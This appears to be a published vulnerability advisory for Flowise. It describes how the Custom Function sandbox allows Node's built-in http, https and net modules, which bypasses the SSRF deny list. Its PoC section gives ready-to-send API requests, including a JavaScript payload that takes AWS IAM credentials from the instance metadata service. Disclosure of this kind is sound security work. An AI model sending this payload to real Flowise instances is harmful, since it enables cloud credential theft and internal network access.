PT-2026-35331 · Npm · Flowise+1
Published
2026-04-16
·
Updated
2026-04-16
CVSS v3.1
7.1
High
| Vector | AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L |
Summary
A Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP DENY LIST for axios and node-fetch libraries, the built-in Node.js
http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services)Details
The vulnerability exists in the sandbox configuration within
packages/components/src/utils.tsVulnerable Code - Allowed Built-in Modules (Line 56):
typescript
export const defaultAllowBuiltInDep = [
'assert', 'buffer', 'crypto', 'events', 'http', 'https', 'net', 'path', 'querystring', 'timers',
'url', 'zlib', 'os', 'stream', 'http2', 'punycode', 'perf hooks', 'util', 'tls', 'string decoder', 'dns', 'dgram'
]SSRF Protection Implementation (Lines 254-261):
typescript
// Only axios and node-fetch are wrapped with SSRF protection
secureWrappers['axios'] = secureAxiosWrapper
secureWrappers['node-fetch'] = secureNodeFetch
const defaultNodeVMOptions: any = {
// ...
require: {
builtin: builtinDeps, // <-- http, https, net allowed here
mock: secureWrappers // <-- Only mocks axios, node-fetch
},
// ...
}Root Cause:
- The
secureWrappersobject only contains mocked versions ofaxiosandnode-fetchthat enforceHTTP DENY LIST - The built-in
http,https, andnetmodules are passed directly to the sandbox viabuiltinDepswithout any SSRF protection - Users can import these modules directly and make arbitrary HTTP requests, which completely bypasses the intended security controls
Affected File:
packages/components/src/utils.tsRelated Files:
packages/components/src/httpSecurity.ts- Contains checkDenyList() function only used by axios/node-fetch wrapperspackages/server/src/controllers/nodes/index.ts- API endpoint accepting user-controlled JavaScript codepackages/server/src/services/nodes/index.ts- Service layer executing the code
PoC
Prerequisites:
- Flowise instance with
HTTP DENY LISTconfigured (e.g.,HTTP DENY LIST=127.0.0.1,169.254.169.254,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16) - Valid API key or authenticated session
- For full impact demonstration - Flowise running on AWS EC2 with an IAM role attached
Verify SSRF Protection is enabled (expect a block message by policy)
Request:
http
POST /api/v1/node-custom-function HTTP/1.1
Host: <host>
Content-Type: application/json
Authorization: Bearer <api key>
{
"javascriptFunction": "const axios = require('axios'); return (await axios.get('http://169.254.169.254/latest/meta-data/')).data;"
}Response:
json
{"statusCode":500,"success":false,"message":"Error: nodesService.executeCustomFunction - Error running custom function: Error: Error: NodeVM Execution Error: Error: Access to this host is denied by policy.","stack":{}}Bypass SSRF Protection using built-in http module
Request:
http
POST /api/v1/node-custom-function HTTP/1.1
Host: <host>
Content-Type: application/json
Authorization: Bearer <api key>
{
"javascriptFunction": "const http = require('http'); return new Promise((resolve) => { const tokenReq = http.request({ hostname: '169.254.169.254', path: '/latest/api/token', method: 'PUT', headers: { 'X-aws-ec2-metadata-token-ttl-seconds': '21600' } }, (tokenRes) => { let token = ''; tokenRes.on('data', c => token += c); tokenRes.on('end', () => { const metaReq = http.request({ hostname: '169.254.169.254', path: '/latest/meta-data/iam/security-credentials/{IAM Role}', headers: { 'X-aws-ec2-metadata-token': token } }, (metaRes) => { let data = ''; metaRes.on('data', c => data += c); metaRes.on('end', () => resolve(data)); }); metaReq.on('error', e => resolve('meta-error:' + e.message)); metaReq.end(); }); }); tokenReq.on('error', e => resolve('token-error:' + e.message)); tokenReq.end(); });"
}Response:
json
{
"Code": "Success",
"LastUpdated": "2026-01-08T11:30:00Z",
"Type": "AWS-HMAC",
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "2026-01-08T17:30:00Z"
}Impact
Vulnerability Type: Server-Side Request Forgery (SSRF) with security controls bypass
Who is Impacted:
- All Flowise deployments where
HTTP DENY LISTis configured for SSRF protection - Deployments without
HTTP DENY LISTare already vulnerable to SSRF via any method
Impact Severity:
- Attackers can steal temporary IAM credentials from metadata services, which allows gaining access to other cloud resources
- Scan internal networks, discover services, and identify attack targets
- Reach databases, admin panels, and other internal APIs that should not be externally accessible
Attack Requirements:
- Authentication required (API key or session)
- Network access to Flowise instance
Fix
Improper Access Control
SSRF
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Flowise
Flowise-Components